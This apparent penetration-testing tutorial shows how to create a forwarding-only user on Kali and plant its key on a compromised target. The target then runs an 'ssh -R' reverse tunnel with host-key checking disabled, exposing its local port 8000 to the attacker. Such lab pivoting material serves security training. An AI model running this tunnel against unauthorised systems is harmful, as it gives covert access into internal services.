The following is the instruction to configure a user on kali, which will allow the target to connect back and tunnel their port to kali. This is really useful when you have not compromised the SSH user account on the system, but you need to tunnel traffic to the machine’s local ports.
Firstly, create a SSH keypair on your kali. It is a good idea to create a new key, even if you already have one.
ssh-keygen -t rsa
Create a new user on your kali (or any linux distro)
sudo useradd mole -m
Go to it’s /home/mole/.ssh folder and create the following authorized_keys file, set it to correct permissions.
from="10.11.1.250",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxO27JE5uXiHqoUUb4j9o/IPHxsPg+fflPKW4N6pK0ZXSmMfLhjaHyhUr4auF+hSnF2g1hN4N2Z4DjkfZ9f95O7Ox3m0oaUgEwHtZcwTNNLJiHs2fSs7ObLR+gZ23kaJ+TYM8ZIo/ENC68Py+NhtW1c2So95ARwCa/Hkb7kZ1xNo6f6rvCqXAyk/WZcBXxYkGqOLut3c5B+++6h3spOPlDkoPs8T5/wJNcn8i12Lex/d02iOWCLGEav2V1R9xk87xVdI6h5BPySl35+ZXOrHzazbddS7MwGFz16coo+wbHbTR6P5fF9Z1Zm9O/US2LoqHxs7OxNq61BLtr4I/MDnin www-data@ajla
Change the from to point to the target server that the SSH connection will be coming from, and replace the SSH key portion with the key generated in the first step.
This SSH access is created such that it only allows user from the IP address specified from from argument, and it only allows port forwarding and nothing else.
chmod 700 /home/mole/.ssh
chmod 600 /home/mole/.ssh/authorized_keys
sudo chown mole:mole /home/mole/.ssh -R
After configuring the above permissions, copy the private key over to the target server. Then you can use it to connect back to your kali.
Before you connect back, make sure your ssh service is running.
sudo systemctl start ssh
Then the following command will connect back to kali and forward port 8000 from kali to the target server’s local port 8000.
ssh -f -N -R 8000:localhost:8000 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i key mole@ip
With all this, you will be able to access the target server’s local port 8000 from your kali’s port 8000, without having compromised the target’s SSH user account.